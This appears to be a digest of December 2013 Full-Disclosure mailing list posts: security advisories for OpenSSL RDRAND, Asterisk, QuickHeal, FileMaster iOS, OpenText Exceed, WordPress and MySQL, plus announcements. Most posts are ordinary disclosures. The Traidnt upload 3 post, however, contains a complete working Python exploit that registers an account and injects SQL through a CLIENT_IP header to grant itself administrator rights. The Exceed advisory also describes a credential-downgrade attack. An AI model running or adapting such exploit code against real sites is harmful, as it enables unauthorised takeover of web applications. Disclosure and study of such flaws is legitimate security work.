Re: [Full-disclosure] RDRAND used directly when default engines loaded in openssl-1.0.1-beta1 through openssl-1.0.1e
On Sat, Dec 14, 2013 at 4:33 AM, coderman wrote: > ... > if you are using an application linked with openssl-1.0.1-beta1 > through openssl-1.0.1e you should do one of the following: updated list with env suggestion: a.) rebuild your OpenSSL with OPENSSL_NO_RDRAND defined b.) call ENGINE_unregister_RAND() on "rdrand" engine followed by ENGINE_register_all_complete() to unregister rdrand as default c.) set OPENSSL_ia32cap="~0x4000" in global environment (this is poor fix) d.) git pull latest openssl with commit: "Don't use rdrand engine as default unless explicitly requested." - Dr. Stephen Henson "what is affected??" - someone sorry, i am not your distro maintainer. but the list includes, potentially (depending on configure opts / runtime / etc): RHEL 6.5, 7.0 Centos 6.5 Fedora 18,19,rawhide Ubuntu 12.04, 12.10, 13.04, 13.10, trusty Debian 7.0, jessie, sid Gentoo stable&unstable Knoppix 7.0.5, 7.2.0 Kali 1.0.5 Slackware 14, 14.1, current ... if ssh built with --with-ssl-engine. these all use OpenSSL 1.0.1+. (remember both ssh client and server may use engines!) and other libs, like: M2Crypto libpam-sshagent-auth encfs ... which appear to use OpenSSL default engines. but really, you should go check your shit. best regards, P.S. if anyone is aware of RDRAND engine backports to OpenSSL 1.0.0* or 0.9.8* in any distros i'd like to know about it! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability
Document Title: === QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1171 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6767 CVE-ID: = CVE-2013-6767 Release Date: = 2013-12-16 Vulnerability Laboratory ID (VL-ID): 1171 Common Vulnerability Scoring System: 5.6 Product & Service Introduction: === The simple interface and best virus protection technology of Quick Heal AntiVirus Pro ensures complete security without interrupting or slowing down your system. Real time cloud security restricts access to malware infected websites. Spam filters stop phishing and infected emails from reaching your inbox. Uninterrupted PC usage and viewing without prompts. Quick Heal Anti-Virus is an all-round antivirus and security tool aimed at the intermediate home user. On first appearances, Quick Heal Anti-Virus doesn’t do well. Installation is complicated, and the initial window that shows up is not, in fact, the main interface. Once you find your way back to the control center, however, things become much clearer. Visually, Quick Heal Anti-Virus is fairly successful. It has a nice, if not revolutionary, interface and all the sections are easy to navigate. It also has a good selection of configuration options, where you can customize everything from what behavior the program takes when it finds a virus to setting a password so nobody can change your configurations. (Copy of the Homepage: http://www.quickheal.com/download-free-antivirus ) Abstract Advisory Information: == An independent laboratory researcher discovered a local stack buffer overflow vulnerability in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software. Vulnerability Disclosure Timeline: == 2013-12-16:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Quick Heal Technologies (P) Ltd Product: QuickHeal AntiVirus - Software 7.0.0.1 (build 2.0.0.1 - 2.0.0.0) Exploitation Technique: === Local Severity Level: === Medium Technical Details & Description: A local stack buffer overflow vulnerability has been discovered in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software. The vulnerability allows local low privileged user accounts to compromise the system by a classic stack overflow issue. QuickHeal Antivirus suffers from improper handling of buffers in it`s `pepoly.dll` module on certain conditions which leads to a stack overflow. Upon disabling `Core scanning server` service, the vulnerable point could be triggered & crash the system. Just run the PoC & once you see properties dialog, change your tab from `General` to `QuickHeal`. This will cause the QuickHeal to scan your file & reports back to you the file status (whether it`s infected or clean). It`s notable that, in normal conditions I was unable to trigger the vulnerability, & this is what`s the reason why I inject a dll into `explorer.exe` to trigger the bug in right manner. The vulnerability is located in the generated PE file `*.text` value. Local attackers are able to overflow the process by a manipulated import of a malicious PE file. The issue is a classic (uni-code) stack buffer overflow. Local attackers can overwrite the registers to compromise the system or crash the quickheal software system process. The security risk of the local stack buffer overflow vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 5.6(+)|(-)5.7. The vulnerability can be exploited by local attackers with low privileged system user account and without user interaction. Successful exploitation of the local stack buffer overflow software vulnerability results in process- and system compromise. Proof of Concept (PoC): === The local stack buffer overflow vulnerability can be exploited by local attackers with low privileged system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. --- PoC Debug Logs --- eax=15bc ebx=03f48a0c ecx=03f12a34 edx=03f47a68 esi=089c84e8 edi= eip=05bab107 esp=03f47a2c ebp=000822d8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0202 *** WARNING: Unable to verify checksum for C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll - pepoly!GetRealTypeByContents+0x297147: Missing image name, possible paged-out or corrup
[Full-disclosure] AST-2013-007: Asterisk Manager User Dialplan Permission Escalation
Asterisk Project Security Advisory - AST-2013-007 ProductAsterisk SummaryAsterisk Manager User Dialplan Permission Escalation Nature of Advisory Permission Escalation SusceptibilityRemote Authenticated Sessions Severity Minor Exploits KnownNone Reported On November 25, 2013 Reported By Matt Jordan Posted On December 16, 2013 Last Updated OnDecember 16, 2013 Advisory Contact David Lee < dlee AT digium DOT com > CVE Name Pending Description External control protocols, such as the Asterisk Manager Interface, often have the ability to get and set channel variables; this allows the execution of dialplan functions. Dialplan functions within Asterisk are incredibly powerful, which is wonderful for building applications using Asterisk. But during the read or write execution, certain diaplan functions do much more. For example, reading the SHELL() function can execute arbitrary commands on the system Asterisk is running on. Writing to the FILE() function can change any file that Asterisk has write access to. When these functions are executed from an external protocol, that execution could result in a privilege escalation. Resolution Asterisk can now inhibit the execution of these functions from external interfaces such as AMI, if live_dangerously in the [options] section of asterisk.conf is set to no. For backwards compatibility, live_dangerously defaults to yes, and must be explicitly set to no to enable this privilege escalation protection. Affected Versions Product Release Series Asterisk Open Source1.8.x All Versions Asterisk Open Source10.x All Versions Asterisk with Digiumphones 10.x-digiumphonesAll Versions Asterisk Open Source11.x All Versions Certified Asterisk 1.8.x All Versions Certified Asterisk 11.x All Versions Corrected In Product Release Asterisk Open Source 1.8.24.1, 10.12.4, 11.6.1 Asterisk with Digiumphones 10.12.4-digiumphones Certified Asterisk1.8.15-cert4, 11.2-cert3 Patches SVN URL Revision http://downloads.asterisk.org/pub/security/AST-2013-007-1.8.diff Asterisk 1.8 http://downloads.asterisk.org/pub/security/AST-2013-007-10.diff Asterisk 10 http://downloads.asterisk.org/pub/security/AST-2013-007-10-digiumphones.diff Asterisk 10-digiumphones http://downloads.asterisk.org/pub/security/AST-2013-007-11.diff Asterisk 11 http://downloads.asterisk.org/pub/security/AST-2013-007-1.8.15.diff Certified Asterisk 1.8.15 http://downloads.asterisk.org/pub/security/AST-2013-007-11.2.diff Certified Asterisk 11.2 Links https://issues.asterisk.org/jira/browse/ASTERISK-22905 Asterisk Project Securit
[Full-disclosure] AST-2013-006: Buffer Overflow when receiving odd length 16 bit SMS message
Asterisk Project Security Advisory - AST-2013-006 ProductAsterisk SummaryBuffer Overflow when receiving odd length 16 bit SMS message Nature of Advisory Buffer Overflow and Remote Crash SusceptibilityRemote SMS Messages Severity Major Exploits KnownNone Reported On September 26, 2013 Reported By Jan Juergens Posted On December 16, 2013 Last Updated OnDecember 16, 2013 Advisory Contact Scott Griepentrog CVE Name Pending Description A 16 bit SMS message that contains an odd message length value will cause the message decoding loop to run forever. The message buffer is not on the stack but will be overflowed resulting in corrupted memory and an immediate crash. Resolution This patch corrects the evaluation of the message length indicator, ensuring that the message decoding loop will stop at the end of the received message. Thanks to Jan Juergens for finding, reporting, testing, and providing a fix for this problem. Affected Versions Product Release Series Asterisk Open Source1.8.x All Versions Asterisk Open Source10.x All Versions Asterisk with Digiumphones 10.x-digiumphonesAll Versions Asterisk Open Source11.x All Versions Certified Asterisk 1.8.x All Versions Certified Asterisk 11.x All Versions Corrected In Product Release Asterisk Open Source 1.8.24.1, 10.12.4, 11.6.1 Asterisk with Digiumphones 10.12.4-digiumphones Certified Asterisk1.8.15-cert4, 11.2-cert3 Patches SVN URL Revision http://downloads.asterisk.org/pub/security/AST-2013-006-1.8.diff Asterisk 1.8 http://downloads.asterisk.org/pub/security/AST-2013-006-10.diff Asterisk 10 http://downloads.asterisk.org/pub/security/AST-2013-006-10-digiumphones.diff Asterisk 10-digiumphones http://downloads.asterisk.org/pub/security/AST-2013-006-11.diff Asterisk 11 http://downloads.asterisk.org/pub/security/AST-2013-006-1.8.15.diff Certified Asterisk 1.8.15 http://downloads.asterisk.org/pub/security/AST-2013-006-11.2.diff Certified Asterisk 11.2 Links https://issues.asterisk.org/jira/browse/ASTERISK-22590 Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2013-006.pdf and http://downloads.digium.com/pub/security/AST-2013-006.html Revision History Date Editor Revisions Made 12/16/2013 Scott Griepentrog Initial Revision Asterisk Project Security Advisory - AST-2013-006 Copyright (c) 2013 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original,
[Full-disclosure] BodyHacking Convention 2014
Hello everyone! I thought you all would probably be interested in this new convention that I'm attempting to start which will be focused on "body hacking". While most conferences and conventions related to this subject matter seem to be more focused on transhumanism, genetics, etc., this one is focused on what YOU can do to YOUR OWN BODY, RIGHT NOW. This covers both modification and augmentation (wearables), and in regards to modification, both functional and aesthetic. Whether or not we hold the convention rests entirely upon the success of the fund raising campaign, which you can find here: http://igg.me/at/bodyhacking-convention/x/4466426 Note that the perks are designed around all types of involvement with the conference, from attendees to sponsors to vendors, so hopefully you'll find something there that fits your level of interest! Thanks, -- I)ruid, C²ISSP dr...@caughq.org http://druid.caughq.org signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FileMaster SY-IT v3.1 iOS - Multiple Web Vulnerabilities
Document Title: === FileMaster SY-IT v3.1 iOS - Multiple Web Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1170 Release Date: = 2013-12-16 Vulnerability Laboratory ID (VL-ID): 1170 Common Vulnerability Scoring System: 8.2 Product & Service Introduction: === FileMaster is a file manager, downloader, document viewer, video/audio player, text editor, wifi drive, and more for iPhone, iPad & iPod Touch. Transfer files from your computer, carry them around with you, and share them with your friends. Using FileMaster is easy. Just long-press on a file or folder icon to display a popup menu. Simply tap your selection and you’re ready to go. You can tap on the screen to copy, paste, create folders and so on. There’s no need to worry about the security of FileMaster, either. Your files can be accessed remotely with a password or locally with a master passcode. No one but you will see what’s in your FileMaster. With FileMaster, you can easily share files with your friends (peer-to-peep only) using Bluetooth. (Copy of the Homepage: https://itunes.apple.com/en/app/filemaster-file-manager-downloader/id582219355 ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the Shenzhen Youmi IT Co. Ltd - FileMaster v3.1 iOS mobile web-application. Vulnerability Disclosure Timeline: == 2013-12-16:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Shenzhen Youmi Information Technology Co. Ltd Product: FileMaster - File Manager & Downloader (Mobile Application) 3.1 Exploitation Technique: === Remote Severity Level: === High Technical Details & Description: 1.2 A local file/path include web vulnerability has been discovered in the Shenzhen Youmi IT Co. Ltd FileMaster v3.1 mobile web-application for apple iOS. The local file include web vulnerability allows remote attackers to unauthorized include local file requests or system specific path commands to compromise the web-application or device. The remote file include web vulnerability is located in the vulnerable `filename` value of the `start upload` module (web interface). Remote attackers can manipulate the POST method request of `filename` value in the `start upload` module to compromise the mobile application. The attack vector is persistent and the request method is POST. The local file/path include execute occcurs in the main `file dir index` list. A secound possibility to execute the payload by usage of the compress function. After the payload with a non executable has been injected the attacker can use the compress function to generate a .zip package. The generated zip executes the payload in the filename itself and affects the main index listing too. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.1(+)|(-)8.2. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. Successful exploitation of the local web vulnerability results in application or connected device component compromise by unauthorized local file include web attacks. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Start Upload Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir List (http://localhost:8000) 1.2 A local file/path include web vulnerability has been discovered in the Shenzhen Youmi IT Co. Ltd FileMaster v3.1 mobile web-application for apple iOS. The local file include web vulnerability allows remote attackers to unauthorized include local file requests or system specific path commands to compromise the web-application or device. The remote file include web vulnerability is located in the vulnerable `folder/path` value of the `Create Folder` module (web interface). Remote attackers can inject own local file requests or system specific path commands as `folder name`. The request method is POST and the attack vector is persistent. The local file/path include execute occcurs in the main `file dir index` list. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.0(+)|(-)8.1. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. Successful exploitation
[Full-disclosure] Release: Faraday Penetration Test IDE
We are happy to announce our first release of Faraday (beta), an open source collaborative Penetration Test IDE console that uses the same tools you use every day. Faraday introduces a new concept (IPE) Integrated Penetration-Test Environment We built a plugin system, where all the I/O from the terminal gets interpreted, if we have a plugin for the command, the output is processed and added to a knowledge base in a transparent way. Our idea was to build a tool that helps from the perspective of a pentester without changing the way you work, adding the support for multi user collaboration on security testing projects. Developed with a specialized set of functionalities that help users improve their own work adding collaborative data sharing, indexation and analysis of the generated knowledge during the engagement of a security audit. [Features] * +40 Plugins (Metasploit, Amap, Arachini, Dnsenum, Medusa, Nmap, Nessus, w3af, Zap and More!) * Collaborative support * Information Highlighting * Knowledge Filtering * Information Dashboard * Conflict Detection * Support for multiple Workspaces * IntelliSense Support * Easy Plugin Development * XMLRPC, XML and Regex Parsers Get it now: http://www.faradaysec.com https://github.com/infobyte/faraday [Contact] @faradaysec #faraday-dev on irc.freenode.net We hope you enjoy it! -- Francisco Amato http://www.linkedin.com/in/famato http://twitter.com/famato Infobyte LLC. 2699 S. Bayshore Dr #300. [33133], Miami, FL Phone: +1 305 851 3373 http://www.infobytesec.com http://blog.infobytesec.com http://twitter.com/infobytesec ___ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by Infobyte for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify Infobyte immediately by contacting the sender via reply e-mail or forwarding to Infobyte at in...@infobytesec.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Information Leakage and Backdoor vulnerabilities in WordPress
Hello list! As I've announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordPress 3. At 30.11.2013 I disclosed many new vulnerabilities in WordPress. I've disclosed 10 holes (they were placed at my site for your attention). And this is translation of the first part of these holes. These are Information Leakage and Backdoor vulnerabilities in WordPress. Which I knew since June 2006 and they are still actual for all versions of WP. - Affected products: - Vulnerable are WordPress 3.7.1 and previous versions. And also WP 3.8, which was released at 14.12.2013 (since developers traditionally made their new version "vulnerabilities compatible"). -- Details: -- Information Leakage (WASC-13): The login and password from e-mail are saved in DB in plain text (unencrypted) in Writing Settings (http://site/wp-admin/options-writing.php), if this functionality is used. So by receiving data from DB via SQL Injection or Information Leakage vulnerability, or by receiving content of this page via XSS, or by accessing admin panel via any vulnerability, it's possible to get login and password from e-mail account. Which allows to take over this site (including in the future, via password recovery function) and other sites, where there is password recovery function, which will send letters to this e-mail. Because an user may use his main e-mail account in the settings (I saw such cases in Internet). This is complete jackpot. Backdoor: This functionality also can be used as backdoor. When attacker's e-mail is set in options Writing Settings, from which the posts will be published at web site. With XSS code, with black SEO links, with malware code, etc. Timeline: 2013.11.30 - disclosed at my site (http://websecurity.com.ua/6905/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenText Exceed On Demand 8 multiple vulnerabilities
Exceed onDemand (EoD) is a dependable managed application access solution
designed for enterprises. It offers pixel perfect drawing, low cost
scalability and trusted security access over any network connection.
Vulnerabilities are present in the current version of the software:
- Product URL:
http://connectivity.opentext.com/products/exceed-ondemand.aspx
- Product Name: **OpenText Exceed OnDemand 8**
- Client version: <= **13.8.3.497**
- Server version: <= **13.8.3.521**
All proof-of-concept codes together with this advisory are hosted at
https://github.com/koto/exceed-mitm
Credits
=
- Slawomir Jasek ``
- Krzysztof Kotowicz ``
Dates
=
- 18.11.2013 - Vendor disclosure
- 21.11.2013 - Additional vulnerabilities found & reported to vendor
- 21.11.2013 - Vendor acknowledges the report, "no further details to
share"
- 06.12.1013 - Query about issue resolution & initial public disclosure
date, vendor ignores
- 16.12.2013 - Full disclosure
Authentication bypass due to protocol downgrade (CVE-2013-6806)
===
Summary
---
If communication between EoD Client and Cluster Manager can be intercepted
and tampered with (e.g. by using ARP poisoning/DNS hijacking/rogue access
point), EoD Client can be forced to using older authentication protocol,
sending out credentials in the clear.
Details
---
Upon connecting to Cluster Manager (TCP port 5500), EoD Client sends 4
bytes: `\x01\x01\x00\x00`, in turn CM responds with 4 bytes, negotiating
the version of the protocol to use. Respond from current CM version is :
`\x0b\x00\x00\x00`. Such a reponse triggers SSL handshake (similar to
STARTSSL mechanism), credentials are then sent in encrypted SSLv3
connection:
Wireshark dump of the beginning of connection:
01 01 00 00
0b 00 00 00
0004 16 03 00 00 6d 01 00 00 69 03 00 52 8d e8 02 cf m...
i..R
0014 88 d3 96 14 f4 a3 7c 47 f3 0d 85 57 58 d6 c9 f7 ..|G
...WX...
0024 18 24 95 15 2e 05 82 27 b7 1e ff 00 00 42 00 3a .$.'
.B.:
0034 00 39 00 38 00 35 00 34 00 33 00 32 00 2f 00 1b .9.8.5.4
.3.2./..
0044 00 1a 00 19 00 18 00 17 00 16 00 15 00 14 00 13
0054 00 12 00 11 00 0a 00 09 00 08 00 07 00 06 00 05
0064 00 04 00 03 c0 19 c0 18 c0 17 c0 16 c0 15 00 ff
0074 01 00..
(16 03 ... bytes initiate SSL connection)
However, if the attacker modifies the response, sending e.g.
`\x01\x01\x00\x00`, client will send credentials in the clear without
establishing SSL connection first:
01 01 00 00
01 01 00 00
0004 11 01 30 0d 08 03 f1 00 00 00 00 00 00 00 00 00 ..0.
0014 00 ff ff 7f 00 00 01 ac 3d 08 08 68 69 6a 61 63
=..hijac
0024 6b 65 64 0a 30 35 31 45 31 45 31 41 32 36 00 01 ked.051E
1E1A26..
Exemplary bytes sent right after the 8-bytes handshake contain user login
and obfuscated password. In standard connection, the same packet is sent
within SSL stream.
We did not try to use Kerberos-based authentication protocol, but the
attack against that will most likely be identical (instead of credentials
the Kerberos ticket will be sent in the clear).
Access conditions
---
Man-in-the-middle attacker
Impact
--
Credentials disclosure, authentication bypass
Proof of Concept
`exceed-downgrade.py` script can be used to test for and exploit that
vulnerability.
Recommendation
-
Do not allow servers to downgrade a protocol in EoD Client communication.
Always require that the credentials are sent in encrypted channel.
More info
-
- CWE-757: Selection of Less-Secure Algorithm During Negotiation
('Algorithm Downgrade') - http://cwe.mitre.org/data/definitions/319.html
- http://en.wikipedia.org/wiki/Opportunistic_encryption
Man in the Middle vulnerability (CVE-2013-6807)
Summary
---
If communication between EoD Client and Cluster Manager can be intercepted
and tampered with (e.g. by using ARP poisoning/DNS hijacking/rogue access
point), communication over SSL channel can be man-in-the-middled due to
using anonymous SSL ciphers.
Details
---
Current version of EoD client when connecting to server side components,
establishes encrypted SSL connection (with the exception of connecting to
EoD Proxy, for which SSL encryption is optional and turned off by default).
In SSL `ClientHello` message EoD client advertises several anonymous
ciphers. In their default configuration EoD servers choose one of
advertised anonymous SSL ciphers for encryption
`SSL_
Re: [Full-disclosure] Kaspersky Internet Security - fake av.
Em 15-12-2013 21:48, vx Indy escreveu: > Hello. > > Here is the description(ru). > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ hi indy,im iPwn =)) nice work.. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2819-1] End-of-life announcement for iceape
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2819-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff December 16, 2013 http://www.debian.org/security/faq - - Package: iceape Security support for Iceape, the Debian-branded version of the Seamonkey suite needed to be stopped before the end of the regular security maintenance life cycle. We recommend to migrate to Iceweasel for the web browser functionality and to Icedove for the e-mail bits. Iceweasel and Icedove are based on the same codebase and will continue to be supported with security updates. Alternatively you can switch to the binaries provided by Mozilla available at http://www.seamonkey-project.org/releases/ Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iEYEARECAAYFAlKvJBMACgkQXm3vHE4uyloALgCfU5PPVJ7Ajg4g1MestH4cEcxl +0cAn3cqG8HvyUNp4ACD9/96gZG5HigR =AbYs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2818-1] mysql-5.5 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2818-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso December 16, 2013 http://www.debian.org/security/faq - - Package: mysql-5.5 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-1861 CVE-2013-2162 CVE-2013-3783 CVE-2013-3793 CVE-2013-3802 CVE-2013-3804 CVE-2013-3809 CVE-2013-3812 CVE-2013-3839 CVE-2013-5807 Debian Bug : 711600 732306 Several issues have been discovered in the MySQL database server. The vulnerabilities are addressed by upgrading MySQL to a new upstream version, 5.5.33, which includes additional changes, such as performance improvements, bug fixes, new features, and possibly incompatible changes. Please see the MySQL 5.5 Release Notes for further details: http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-32.html http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-33.html In addition this update fixes two issues affecting specifically the mysql-5.5 Debian package: A race condition in the post-installation script of the mysql-server-5.5 package creates the configuration file "/etc/mysql/debian.cnf" with world-readable permissions before restricting the permissions, which allows local users to read the file and obtain sensitive information such as credentials for the debian-sys-maint to perform administration tasks. (CVE-2013-2162) Matthias Reichl reported that the mysql-5.5 package misses the patches applied previous in Debian's mysql-5.1 to drop the database "test" and the permissions that allow anonymous access, without a password, from localhost to the "test" database and any databases starting with "test_". This update reintroduces these patches for the mysql-5.5 package. Existing databases and permissions are not touched. Please refer to the NEWS file provided with this update for further information. For the stable distribution (wheezy), these problems have been fixed in version 5.5.33+dfsg-0+wheezy1. For the unstable distribution (sid), the Debian specific problems will be fixed soon. We recommend that you upgrade your mysql-5.5 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iQIcBAEBCgAGBQJSryLPAAoJEAVMuPMTQ89EcUgP/3rFEb0ydpw8hOvzrXHqzPUR YYAXDJbXwhGhh280DeYOFkDu5Xd28LYWsne0o+gwd+Csp2Q3lcVfzULUb3j7ddl1 Jlfd5FxXFTcIPXqVo6RmOgf7GOl77bg+sCeIqNrjaPBsBIzZQmoTHjfXQTKqKiZF WMwMnIVoeCdY23LYosnel5MXfiHaPpqGDhUkeoFnJ4m2+hfvHbM3Pj+3IjgwAvF+ p0tiMfvjJ9muVsj4xDnGk9z4JlDONoohqiv5mtL2NNY6bV6T6aTo74SadnKsp6dU ug0KeuwDtVe7l1Mzq8O0qCJHEEfHfZ1IsvoPAwndN8yqXbHQ8pU/9vyz+5LxGb6z VkGkGVzypSI8u6B+zGYBa54zrKO5DaS/YAlKU+wkWSdH9RcdMoHTYOlMBh8wQXoW mfnIZ6V4pv1Usm5xiZpQU6BrJaWWyDqZPdlK8oLplKkKJFHsQz7tjZylO64HGR3X tEu8qjfWblPR37gWY3FRErN1zIDiRzt6LK67achBdCZ4WxG18f2KQRDbgZzx5n9Z lblYgEYFK1EXE5rutHe9nwKkDS9DfSRuybty6WCqcmLBEIu8vDoHbDXR683UNsCT 84AwQrv7/QfugQHWpEA7nabDprrKK9TM3hjdQjqlelX3/kLpAQYkTxDSJ6uINH0H gubK4/5nmK0zX7OoNwWt =5UEA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Arabportal 2.x , Sql injection / Password reset exploit
Nice SQL injection and Password reset Exploitation First released @ the deep side of sec4ever.com since more than one year <> ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Traidnt up 3 , Admin info reset exploit
Traidnt upload version 3
don't filter the x_forwarded_for header which allow the attacker to exploit
it to update administrator's data
#!/usr/bin/python
import urllib2
import sys
print """
+---+
| Traidnt upload 3 - Admin add Exploit|
| By i-Hmx |
|sec4ever.com |
| n0p1...@gmail.com |
+---+"""
target=str(raw_input("[*] Enter Target # "))
print "[+] Adding new user"
try:
register=urllib2.urlopen(target+"/register.php","name=farsawy&email=n0p1...@gmail.com&password=sec4ever&rules=faris rules")
except:
print "[-] Exception happened :("
sys.exit()
print "[+] Grabbing Cookies"
login=urllib2.urlopen(target+"/login.php?do=login","username=farsawy&password=sec4ever")
headers=login.headers.items()
for header in headers:
if header[0]=="set-cookie":
cookies=header[1]
if cookies.find("upload_sid")==-1:
print "[-] Exploitation Failed"
sys.exit()
print "[+] Upgrading privelages"
req=urllib2.Request(target+"/cp.php",headers={"Cookie":cookies,"CLIENT_IP":"1337',`group`='1"})
upgrade=urllib2.urlopen(req)
print "[+] Login with the following data\n+ User : farsawy\n+ pass : sec4ever\n+ Probably you are an admin now ;)"
sys.exit()___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WordPress OptimizePress Theme - File Upload Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On 12/14/2013 09:04 AM, cve-ass...@mitre.org wrote:
>> http://blog.sucuri.net/2013/12/wordpress-optimizepress-theme-file-upload-vulnerability.html
>
>>
>> http://help.optimizepress.com/customer/portal/articles/1381790-important-optimizepress-1-0-security-update
>
>> Important OptimizePress 1.0 Security Update This is an important
>> announcement for OptimizePress 1.0 users. (Please note this does
>> NOT apply to OptimizePress 2.0 which is built with a completely
>> new codebase)
>
>> The target of the attack is the following file:
>> lib/admin/media-upload.php. It can be used to upload any file to
>> the wp-content/uploads/optpress/images_comingsoon directory. It
>> doesn't even change the extension.
>
>> Look for the following files: lib/admin/media-upload.php,
>> lib/admin/media-upload-lncthumb.php,
>> lib/admin/media-upload-sq_button.php
>
>> Patch:
>
>> if ( !current_user_can('add_users') ) { echo 'You cannot access
>> this file. Sorry.'; exit; }
>
> Use CVE-2013-7102.
FYI this issue has been assigned a CVE.
- --
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.15 (GNU/Linux)
iQIcBAEBAgAGBQJSrgS3AAoJEBYNRVNeJnmTa7wP/1EjYhv5lY1y2S38RCafWtow
jy4DT2rf0CrJKi256u/0667DFa46PrRbu34kXu2b+tjgBlx5/gSORND2jIvcSnti
dAfRP2q1abGVe0pkbRN8bUINwTS9ITag0ec4pwBVT/4ct9Xmnqi1xgUfuzLca2Vm
skjwcW6elbe4L1jEWGqxaC5umPkprKDcq98hCu57CZPhG1Gf2nmA05Icl5YXw7s9
dL7y/VDXkfM66bQfOkceB3SdfktsyI6MC8OLax+mzRr4+Pa3mnlZ12yOr4XDxd3n
mlg3pbF+6/vioQM5Qp36iLJ2fINKL9eAtwv/8O40LrwN0QQXQbP9efg/VPzOzztC
Dl849SYKfPB5ZAV1bkEZJHkog3WVxMC2f5c/Na/ive4I0iDzrykZA7pydqHd3JcV
iwtiIlwqaw4NP+zVi+WOWxpUxlZy3lPPDE8VpvCcEMPQTW8G+MhhLCB098Zr+S04
GGrnmXWiw0pSYHM+DzrqQcHSZon9n17YHAZyc+gYAI4WN/sEhi+tVwlAQacYn9CB
FxirWZMR45E9fEbEQtQ4En5zLmgQuY3VMBByqf4eGh111cSvE8fg36TFUtH0H+Od
G8HYpUfSXvkkOQa6J13Ve54FK75UCz1jTyvj8XcLZ3kiJm2BfTebwftltnypNgGL
VvS3QQNAc5ZeOfGX1i+6
=r0IP
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
